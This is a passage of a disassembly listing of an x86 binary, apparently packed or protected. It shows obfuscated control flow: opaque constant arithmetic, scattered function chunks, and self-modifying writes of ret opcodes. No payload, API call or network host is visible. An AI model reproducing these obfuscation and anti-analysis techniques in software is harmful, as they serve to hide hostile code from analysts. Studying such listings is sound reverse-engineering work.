		xor	esi, 1834E06Ch
		add	eax, esi

loc_456B94:				; CODE XREF: hvvrg7ie:0045400Ej
		jmp	loc_450E8B
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------

loc_456B99:				; CODE XREF: hvvrg7ie:0043B159j
		jb	loc_439075
		jmp	loc_43FDFC
; ---------------------------------------------------------------------------

loc_456BA4:				; CODE XREF: hvvrg7ie:0043AD76j
		adc	ecx, edi
; START	OF FUNCTION CHUNK FOR sub_4480B3

loc_456BA6:				; CODE XREF: sub_4480B3-D356j
		rol	edi, 1Ch
		or	edi, 590817AEh
		add	edi, 22B791A6h
		jmp	loc_451521
; END OF FUNCTION CHUNK	FOR sub_4480B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_456BBA:				; CODE XREF: sub_43E128:loc_439D1Aj
					; hvvrg7ie:00439D2Bj
		sub	esi, 74814F36h
		or	esi, 2DFF1C08h

loc_456BC6:				; CODE XREF: hvvrg7ie:loc_43DC63j
		call	sub_44E609
		push	887AE3D5h
		xchg	ebp, [esp+4+var_4]
		mov	edx, ebp
		pop	ebp
		and	edx, 49ABB6D3h
		rol	edx, 6
		call	sub_458BE3

loc_456BE4:				; CODE XREF: hvvrg7ie:00448247j
		jmp	nullsub_18
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DE4

loc_456BE9:				; CODE XREF: sub_448DE4-1AB8j
		jmp	sub_458A13
; END OF FUNCTION CHUNK	FOR sub_448DE4
; ---------------------------------------------------------------------------

loc_456BEE:				; CODE XREF: hvvrg7ie:004538BDj
		jnp	sub_44AC6E
		add	edx, ecx

loc_456BF6:				; CODE XREF: hvvrg7ie:loc_459B66j
		push	0F9E0AB37h
		pop	eax
		sub	eax, 62A705BAh
		rol	eax, 0Ch
		test	eax, 400000h
		jmp	loc_446718
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_456C11:				; CODE XREF: sub_44B1C6+7C5j
		jmp	loc_450C73
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447BB7

loc_456C16:				; CODE XREF: sub_447BB7+14j
		jmp	loc_43F416
; END OF FUNCTION CHUNK	FOR sub_447BB7

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_456C1B	proc near		; CODE XREF: sub_43AB99+365Ap

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043BF1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441825 SIZE 00000014 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF4h
		mov	[ebp+var_8], eax
		jmp	loc_441825
sub_456C1B	endp


; =============== S U B	R O U T	I N E =======================================



sub_456C29	proc near		; DATA XREF: sub_4480B3+9471o
		lea	eax, sub_45A91B
		mov	byte ptr [eax],	0C3h
		jmp	sub_45A91B
sub_456C29	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A91B

loc_456C37:				; CODE XREF: sub_45A91Bj
		pop	edx
		mov	eax, [esp+0]
		push	edx
		call	sub_44CB64
		push	72AECE7Fh
		jmp	loc_439158
; END OF FUNCTION CHUNK	FOR sub_45A91B
; ---------------------------------------------------------------------------

loc_456C4B:				; CODE XREF: hvvrg7ie:004391B5j
		pop	eax
		and	eax, 0CE3B0DB9h
		add	eax, 67D71CABh
		add	eax, ebp
		jmp	loc_44A7DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_456C5F:				; CODE XREF: sub_453BA4-77F3j
		sub	eax, 6EC25F44h
		jmp	loc_4466DD
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------

loc_456C6A:				; CODE XREF: hvvrg7ie:loc_44243Aj
		push	0
		jmp	loc_45AE49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_456C71:				; CODE XREF: sub_43D285:loc_44B743j
		call	sub_439549
		test	al, al
		jz	loc_45A947
		jmp	loc_43D0D1
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44809F

loc_456C83:				; CODE XREF: sub_44809F-6246j
		mov	eax, [ebp+8]
		call	sub_43F0A1

loc_456C8B:				; CODE XREF: sub_44E2D2-6081j
		jmp	loc_4448F0
; END OF FUNCTION CHUNK	FOR sub_44809F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439717

loc_456C90:				; CODE XREF: sub_439717+3389j
		jmp	loc_43A49B
; END OF FUNCTION CHUNK	FOR sub_439717
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_155. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_456C96:				; CODE XREF: sub_45889B+2415j
		jmp	loc_4441B6
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_456C9B:				; CODE XREF: sub_454099+474j
		jmp	loc_44AE0E
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_456CA0:				; CODE XREF: hvvrg7ie:00457C6Bj
		mov	esi, eax
		pop	eax
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_456CA3:				; CODE XREF: sub_4557D4-98E7j
		lea	eax, [ebp+var_14]
		xor	edx, edx
		call	sub_456DE7
; END OF FUNCTION CHUNK	FOR sub_4557D4
; START	OF FUNCTION CHUNK FOR sub_43D16B

loc_456CAD:				; CODE XREF: sub_43D16B+50CEj
					; sub_4557D4+Dj
		push	0D040F53Bh
		pop	eax
		or	eax, 0FE4F124Eh
		jmp	loc_4462B3
; END OF FUNCTION CHUNK	FOR sub_43D16B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F6F

loc_456CBE:				; CODE XREF: sub_457F6F:loc_43B1DFj
					; hvvrg7ie:0043B1F6j
		sub	esi, 6090D9B6h
		add	esi, 858FA9F1h
		xchg	esi, [esp+0]
		jmp	loc_450A70
; END OF FUNCTION CHUNK	FOR sub_457F6F
; ---------------------------------------------------------------------------

loc_456CD2:				; CODE XREF: hvvrg7ie:004580FFj
		and	edi, esi

; =============== S U B	R O U T	I N E =======================================



sub_456CD4	proc near		; CODE XREF: hvvrg7ie:0045A9A2p

; FUNCTION CHUNK AT 00439A3B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A983 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C212 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043D7C2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043DBA0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043F48C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004404BF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004421B8 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044252B SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044286D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004447A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004496A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C9E1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F755 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004508D1 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004513D1 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00451731 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00452872 SIZE 0000000C BYTES

		xchg	eax, [esp+0]
		pop	eax
		test	al, al

loc_456CDA:				; CODE XREF: hvvrg7ie:loc_44ECC5j
		jz	loc_4549C2
		jmp	loc_439A3B
sub_456CD4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CB1

loc_456CE5:				; CODE XREF: sub_449CB1-82F8j
		js	loc_45711A

loc_456CEB:				; CODE XREF: sub_449CB1:loc_455B72j
		push	360753B4h
		pop	eax
		add	eax, 0F175CBD2h
		sub	eax, 0DC0EAA19h
		or	eax, 7FFB160Eh
		sub	eax, 50AB86h
		jmp	loc_4458A7
; END OF FUNCTION CHUNK	FOR sub_449CB1
; ---------------------------------------------------------------------------
		xor	edx, 38066843h
		or	ebx, eax
		jmp	sub_448AE0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_456D1B:				; CODE XREF: sub_4554E8-F2C2j
		xchg	edi, ebp
		jns	loc_44171A
		ror	ebx, 2
; END OF FUNCTION CHUNK	FOR sub_4554E8
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_456D26:				; CODE XREF: sub_4554E8:loc_452C00j
					; sub_446D8D:loc_454EBDj
		mov	eax, [esp+0]
		call	sub_451703

loc_456D2E:				; CODE XREF: sub_4554E8-1A4FAj
					; sub_449387+2j
		xchg	eax, [esp+0]
		jmp	loc_45574C
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484E1

loc_456D36:				; CODE XREF: sub_4484E1+C8DAj
		jz	loc_4416B8
		jmp	loc_453290
; END OF FUNCTION CHUNK	FOR sub_4484E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446956

loc_456D41:				; CODE XREF: sub_446956+46BFj
		push	0A4942912h
		pop	esi
		rol	esi, 19h

loc_456D4A:				; CODE XREF: sub_444BE1:loc_43EB3Ej
		test	esi, 8000h
		jmp	loc_456DFF
; END OF FUNCTION CHUNK	FOR sub_446956
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B69F

loc_456D55:				; CODE XREF: sub_44B69F+56BBj
		cmp	eax, 1964C220h
		jmp	loc_4423C6
; END OF FUNCTION CHUNK	FOR sub_44B69F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_456D60:				; CODE XREF: sub_43FC15:loc_44D437j
		cmp	al, 0A4h
		jz	loc_459DEA
		jmp	loc_43BD19
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_456D6D:				; CODE XREF: sub_445F2A:loc_44D50Ej
		add	edi, 2E70F34Ah
		xchg	edi, [esp+0]

loc_456D76:				; CODE XREF: hvvrg7ie:0043D045j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_445F2A
; ---------------------------------------------------------------------------

loc_456D7B:				; CODE XREF: hvvrg7ie:loc_43FE4Cj
		lea	eax, nullsub_446
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_446
; ---------------------------------------------------------------------------
		xchg	ecx, [esp]
		mov	edx, ecx
		jmp	loc_4568CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ACA

loc_456D93:				; CODE XREF: sub_455ACA-251j
		jge	loc_44A03C
		sub	esi, edx

loc_456D9B:				; CODE XREF: sub_455ACA:loc_44D538j
		push	offset loc_43DC8E
		jmp	loc_443820
; END OF FUNCTION CHUNK	FOR sub_455ACA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44476B

loc_456DA5:				; CODE XREF: sub_44476B:loc_43D6DCj
		sub	esi, 375D8C6Fh
		push	offset loc_455B25
		jmp	loc_449437
; END OF FUNCTION CHUNK	FOR sub_44476B
; ---------------------------------------------------------------------------

loc_456DB5:				; CODE XREF: hvvrg7ie:loc_458260j
		not	esi
		jmp	loc_448FDE
; ---------------------------------------------------------------------------
		xchg	ebx, edi
		jmp	sub_449466
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB9D

loc_456DC3:				; CODE XREF: sub_45AB9D:loc_44F660j
		pop	eax
		rol	eax, 1Fh
		or	eax, 0A8FF4C9Bh
		add	eax, 4086496Eh
		or	eax, 24642FD5h
		jmp	loc_45331E
; END OF FUNCTION CHUNK	FOR sub_45AB9D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_293. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_456DDF:				; CODE XREF: hvvrg7ie:00446784j
		xchg	esi, [esp]
		jmp	loc_4457BB

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_456DE7	proc near		; CODE XREF: sub_453D0F-1A782j
					; sub_4396DBp ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00453EE0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00455C29 SIZE 00000013 BYTES

		push	ebp
		mov	ebp, esp
		js	sub_448B99
		add	esp, 0FFFFFFF8h
		jmp	loc_453EE0
sub_456DE7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_456DF8:				; CODE XREF: sub_454099-12C3Aj
		pop	ebp
		pushf

loc_456DFA:				; CODE XREF: sub_454099:loc_459799j
		call	sub_456118
; END OF FUNCTION CHUNK	FOR sub_454099
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_456DFF:				; CODE XREF: sub_443BCD:loc_439E8Dj
					; sub_446956+103FAj
		jmp	loc_453F54
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------

loc_456E04:				; CODE XREF: hvvrg7ie:0044FBA1j
		jmp	loc_43F79F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA70

loc_456E09:				; CODE XREF: sub_43CA70+A72Bj
		add	eax, 2C3CBEADh
		mov	eax, [eax]
		pushf
		add	eax, 0B6CCADAh
		add	eax, 0F493352Ah
		mov	eax, [eax]
		popf
		push	esi
		jmp	loc_454B02
; END OF FUNCTION CHUNK	FOR sub_43CA70

; =============== S U B	R O U T	I N E =======================================



sub_456E27	proc near		; CODE XREF: hvvrg7ie:0043FB3Cj
					; sub_43BDC2+48DDp

; FUNCTION CHUNK AT 0043C11E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FA5E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004445BA SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00445D33 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044E71E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B0B0 SIZE 00000015 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	eax, 0CF28AE6Ch
		mov	eax, [eax]

loc_456E33:				; CODE XREF: hvvrg7ie:loc_445D63j
		or	eax, eax
		jnz	loc_44EDE7
		jmp	loc_44E71E
sub_456E27	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_282. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_456E41:				; CODE XREF: hvvrg7ie:004476B1j
		jmp	locret_439A3A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449007

loc_456E46:				; CODE XREF: sub_449007-B520j
		xchg	esi, [esp+0]
		jmp	loc_458EA9
; END OF FUNCTION CHUNK	FOR sub_449007
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_98. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_456E4F:				; CODE XREF: hvvrg7ie:00440504j
		jmp	sub_4408AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_456E54:				; CODE XREF: sub_458095-15CA0j
		jnz	loc_43B2EA

loc_456E5A:				; CODE XREF: sub_44388C+180DFj
		jmp	loc_4577B2
; END OF FUNCTION CHUNK	FOR sub_458095
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4398FA

loc_456E5F:				; CODE XREF: sub_4398FA+13j
		jmp	loc_44836B
; END OF FUNCTION CHUNK	FOR sub_4398FA
; ---------------------------------------------------------------------------
		add	eax, esi
		add	edx, ebx
		jmp	loc_43B2E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_456E6D:				; CODE XREF: hvvrg7ie:0044AE27j
					; sub_45AAC8-365Ej
		xor	edi, 0C126E289h
		push	offset loc_454DEF
		jmp	nullsub_428
; END OF FUNCTION CHUNK	FOR sub_45AAC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A7B5

loc_456E7D:				; CODE XREF: sub_43A7B5:loc_4591E4j
		mov	eax, 1
		jmp	loc_456753
; END OF FUNCTION CHUNK	FOR sub_43A7B5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_22. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	eax, offset nullsub_22
		jns	loc_45288A
		mov	byte ptr [eax],	0C3h
		jmp	loc_447511
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448ECC

loc_456E9B:				; CODE XREF: sub_448ECC:loc_450D28j
		add	eax, 0ED128E2Eh
		test	eax, 800000h
		jmp	loc_45586B
; END OF FUNCTION CHUNK	FOR sub_448ECC

; =============== S U B	R O U T	I N E =======================================



sub_456EAC	proc near		; CODE XREF: sub_450434+23F6p
					; hvvrg7ie:0045B7DFj

; FUNCTION CHUNK AT 00447E81 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	byte ptr [eax],	0
		push	offset sub_454A8B
		jmp	loc_447E81
sub_456EAC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_456EBD:				; CODE XREF: sub_444B29:loc_448CC0j
		jz	loc_44B09C
		jmp	loc_43F3FA
; END OF FUNCTION CHUNK	FOR sub_444B29

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_456EC8	proc near		; CODE XREF: sub_4413A5+16C7j
		retn
sub_456EC8	endp

; ---------------------------------------------------------------------------
		jb	loc_43B4A8
		jmp	loc_456A69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442334

loc_456ED4:				; CODE XREF: sub_442334:loc_44519Cj
		cmp	edx, 3B261C86h
		jmp	loc_444C35
; END OF FUNCTION CHUNK	FOR sub_442334
; ---------------------------------------------------------------------------
		xor	eax, 0FE279748h
		sub	eax, 86ADAEE7h
		rol	eax, 0Dh

loc_456EEE:				; CODE XREF: hvvrg7ie:00453022j
		sub	eax, 0C7906FE8h
		xor	eax, 0B2585CE9h
		rol	eax, 13h
		jmp	loc_43CC93
; ---------------------------------------------------------------------------

loc_456F02:				; CODE XREF: hvvrg7ie:loc_455932j
		jz	loc_446988
		jmp	loc_441E8E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB53

loc_456F0D:				; CODE XREF: sub_44DB53-F522j
		jz	loc_452A25
		jmp	loc_45888B
; END OF FUNCTION CHUNK	FOR sub_44DB53

; =============== S U B	R O U T	I N E =======================================



sub_456F18	proc near		; CODE XREF: hvvrg7ie:00444EE9j
					; sub_458992+2AFEp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00447E3A SIZE 0000000E BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	edx, [esp-4+arg_0]
		mov	eax, edx
		jmp	loc_447E3A
sub_456F18	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_456F26:				; CODE XREF: sub_4403D4:loc_45403Bj
		test	esi, eax
		jmp	loc_44DE86
; END OF FUNCTION CHUNK	FOR sub_4403D4

; =============== S U B	R O U T	I N E =======================================



sub_456F2D	proc near		; DATA XREF: sub_43DC44+7o
		push	5CEA8707h
		pop	ebx
		sub	ebx, 1848F37h
		add	ebx, 0A4DF7777h
		xchg	ebx, [esp+0]
		jmp	loc_44AA66
sub_456F2D	endp

; ---------------------------------------------------------------------------
		push	0A0E19248h
		jmp	loc_443FF7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44989C

loc_456F51:				; CODE XREF: sub_44989C+C6BCj
		xchg	eax, [edx]

loc_456F53:				; CODE XREF: sub_44989C:loc_455F44j
		rol	ebx, 3
		sub	ebx, 29FCBD86h
		xor	ebx, 82E97CE3h
		xor	eax, ebx
		pop	ebx
		jmp	loc_43CB67
; END OF FUNCTION CHUNK	FOR sub_44989C

; =============== S U B	R O U T	I N E =======================================



sub_456F6A	proc near		; CODE XREF: sub_44D976+Cj
					; sub_4580CF+Bp

; FUNCTION CHUNK AT 0043D115 SIZE 0000000C BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	esi
		mov	esi, eax
		xchg	esi, [esp+0]
		jmp	loc_43D115
sub_456F6A	endp

; ---------------------------------------------------------------------------

loc_456F79:				; CODE XREF: hvvrg7ie:0043EDFCj
		pop	edi
		rol	edi, 15h
		or	edi, 7C0B9F61h
		and	edi, 798F48E9h
		jmp	loc_442CF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_456F8E:				; CODE XREF: sub_43E128:loc_450531j
		jz	loc_44BD6E
		jmp	loc_457B0D
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------

loc_456F99:				; CODE XREF: hvvrg7ie:00452156j
		ja	loc_459E60

; =============== S U B	R O U T	I N E =======================================



sub_456F9F	proc near		; CODE XREF: sub_44E72F:loc_458A95p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043B768 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043C329 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C6F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C710 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043EAD2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043EB31 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00441D29 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044277A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442C70 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00443287 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004443ED SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044575D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00445BCB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447C64 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044ACA6 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044E39C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004509E8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452C8C SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00455081 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004581BD SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00458775 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A437 SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		jb	loc_4581BD
		cmp	dword ptr [ebp-1Ch], 0Fh

loc_456FAD:				; CODE XREF: hvvrg7ie:loc_43EB0Bj
		jnz	loc_43A0F3
		call	sub_4574EE

loc_456FB8:				; CODE XREF: sub_444219+9j
		jmp	loc_442C70
sub_456F9F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_456FBD	proc near		; DATA XREF: sub_440643-1550o

; FUNCTION CHUNK AT 00443DD0 SIZE 00000005 BYTES

		add	eax, ebp
		push	offset loc_44C7EC
		jmp	loc_443DD0
sub_456FBD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_456FC9:				; CODE XREF: hvvrg7ie:0045733Bj
					; sub_4589D3+ED6j ...
		xchg	eax, edx
		push	ebx
		push	21F0E2DCh
		pop	ebx
		jmp	loc_43ED91
; END OF FUNCTION CHUNK	FOR sub_4589D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_456FD6:				; CODE XREF: sub_43F227+11D89j
		jz	loc_43F329
		jmp	loc_44FD26
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_456FE1:				; CODE XREF: hvvrg7ie:00452885j
		add	eax, 92B39145h

; =============== S U B	R O U T	I N E =======================================



sub_456FE7	proc near		; CODE XREF: sub_456F9F:loc_43EAD2p

; FUNCTION CHUNK AT 00439BA2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043ECA0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004532DF SIZE 0000000F BYTES

		xchg	esi, [esp+0]
		pop	esi
		shl	eax, 8
		jmp	loc_43ECA0
sub_456FE7	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_456FF3	proc near		; DATA XREF: sub_450E01-16F7Eo

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004455DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004528D7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00459A6C SIZE 00000006 BYTES

		lea	eax, loc_457315+3
		call	sub_45B721

loc_456FFE:				; CODE XREF: sub_4398B7+1F217j
		jmp	loc_459A6C
sub_456FF3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_457003:				; CODE XREF: hvvrg7ie:004497C1j
		mov	eax, [esp]
		push	edx
		push	edi
		push	2741EE00h

loc_45700D:				; CODE XREF: hvvrg7ie:0044569Cj
		pop	edi
		sub	edi, 295769F2h
		cmp	edi, 511AD6BBh
		jmp	loc_44B1D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_45701F:				; CODE XREF: sub_448100+18j
		pushf
		shr	ebp, 1
		test	edi, 18B411A2h
		jmp	loc_43D7D9
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E813

loc_45702D:				; CODE XREF: sub_43E813:loc_4495D1j
		mov	ecx, eax
		xchg	ecx, [esp+0]
		push	offset loc_444BCC
		jmp	loc_43EE53
; END OF FUNCTION CHUNK	FOR sub_43E813
; ---------------------------------------------------------------------------

loc_45703C:				; CODE XREF: hvvrg7ie:loc_44C7F7j
		jz	loc_44A493
; START	OF FUNCTION CHUNK FOR sub_4443AA

loc_457042:				; CODE XREF: sub_4443AA+4j
		jmp	loc_43C157
; END OF FUNCTION CHUNK	FOR sub_4443AA
; ---------------------------------------------------------------------------

loc_457047:				; CODE XREF: hvvrg7ie:0043963Fj
		jmp	loc_45987E
; ---------------------------------------------------------------------------
		xor	edx, 607E32DFh
		mov	edx, edi
		mov	ecx, [ebp+0]
		jmp	loc_44A488
; ---------------------------------------------------------------------------

loc_45705C:				; CODE XREF: hvvrg7ie:0044E4ECj
		shr	esi, 2

loc_45705F:				; CODE XREF: hvvrg7ie:loc_456241j
		push	0CB77317Ah
		pop	eax
		or	eax, 576B065Ah
		test	eax, 4
		jmp	loc_44FD4C
; ---------------------------------------------------------------------------
		mov	ds:off_41D1B0, eax
		call	sub_457B8C

loc_457081:				; CODE XREF: hvvrg7ie:00455CCFj
		jmp	loc_43BB0F
; ---------------------------------------------------------------------------

loc_457086:				; CODE XREF: hvvrg7ie:00439317j
		jmp	loc_4555EB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_418. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_45708C:				; CODE XREF: sub_43E128+3F0Dj
		and	eax, 0F39A1CFFh
		sub	edi, 0C8F1E9B3h
		and	edx, 36975C11h
		jmp	loc_444B3B
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500E7

loc_4570A3:				; CODE XREF: sub_4500E7:loc_44C6F2j
		mov	[ebp+var_4], eax
		push	9237EEEDh
		pop	eax
		and	eax, 0B47D0AE8h
		rol	eax, 1Fh
		add	eax, 0F84CF0C5h
		add	eax, ebp
		add	eax, 0BF9889C3h
		jmp	loc_449FA9
; END OF FUNCTION CHUNK	FOR sub_4500E7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_203. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B5E2

loc_4570C9:				; CODE XREF: sub_43B5E2-20D8j
		jmp	sub_457C82
; END OF FUNCTION CHUNK	FOR sub_43B5E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_4570CE:				; CODE XREF: sub_44191F:loc_4508F0j
		jge	loc_44F5CC

loc_4570D4:				; CODE XREF: sub_44412E+4E55j
		jmp	loc_450DDD
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------

loc_4570D9:				; CODE XREF: hvvrg7ie:00445858j
		jmp	loc_439681
; ---------------------------------------------------------------------------
		xor	edx, 0E93D9F1h
		sbb	edi, ebx
		ror	ecx, 0Eh
		jmp	loc_442F78
; ---------------------------------------------------------------------------
		push	7554398Bh
		jmp	sub_444BB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_4570F8:				; CODE XREF: sub_456A52:loc_43D166j
		jz	loc_43EAC7
		jmp	loc_44913E
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------

loc_457103:				; CODE XREF: hvvrg7ie:loc_451559j
		sub	eax, 1A13E0D4h
		rol	eax, 18h
		add	eax, 1C1CF473h
